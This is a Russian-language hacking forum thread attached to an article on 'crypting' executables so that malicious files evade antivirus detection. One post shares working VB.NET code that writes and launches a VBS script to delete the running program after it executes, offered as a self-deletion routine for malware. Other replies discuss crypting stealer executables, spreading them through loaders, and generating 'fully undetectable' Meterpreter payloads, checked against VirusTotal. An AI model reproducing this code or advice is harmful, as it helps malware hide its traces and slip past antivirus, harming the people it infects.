Статья прячем вредоносный файл (криптовка ехе)

LuckyNOOB

LuckyNOOB

Active member
28.03.2018
39
2
Что сейчас актуально из приватных?
Что сам написал то и актуально)

Так понимаю, ответ на вопрос как сделать чтобы оно еще и самоудалилось я тут не найду

UPD

Вот функция самоудаления если кому-то пригодится.
Код:
Sub Terminate()
        Dim Body As String = "Set fso = CreateObject(""Scripting.FileSystemObject""): On error resume next: Dim I: I = 0" & vbCrLf & _
        "Set File = FSO.GetFile(""" & Application.ExecutablePath & """): Do while I = 0: fso.DeleteFile (""" & Application.ExecutablePath & """): fso.DeleteFile (""" & Application.StartupPath & "\1.vbs""): " & vbCrLf & _
        "If FSO.FileExists(File) = false Then: I = 1: End If: Loop"
        IO.File.WriteAllText(Application.StartupPath & "\1.vbs", Body, System.Text.Encoding.Default)
        Process.Start(Application.StartupPath & "\1.vbs")
    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Terminate()
    End Sub
Вставляем в конце программы перед End Module. И вызываем командой Terminate()

Кстати вопрос к автору. Решил я попробовать данный метод иии.. Только хуже. Создать простой проект Hello world который просто создает текстовик. Вот virus total

Вот скрин до:

26749


Вот после:

26751
 
  • Нравится
Реакции: Tihon49
Gnom74

Gnom74

New member
26.02.2019
1
0
Всем привет! Значить файл. Ехе. Со стиллера не криптуем?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 028
3 015
Смотря какой стиллак если qwazar какойнить то можно.. или через лодер проливать
 
  • Нравится
Реакции: Tihon49
Ondrik8

Ondrik8

prodigy
08.11.2016
1 028
3 015
Люди вообще форум не читают что ли? Вот же статья про это Meterpreter снова в деле | 100% FUD with Metasploit 5, не только reverse_tcp но и любой payload.
он всегда был в деле)) просто нужно уметь его генерить! )) честно признаюсь сам только не давно к этому пришел, скажу что это не просто, но реально))
 
Tihon49

Tihon49

Well-known member
06.01.2018
201
107
  • Нравится
Реакции: gushmazuko
Мы в соцсетях: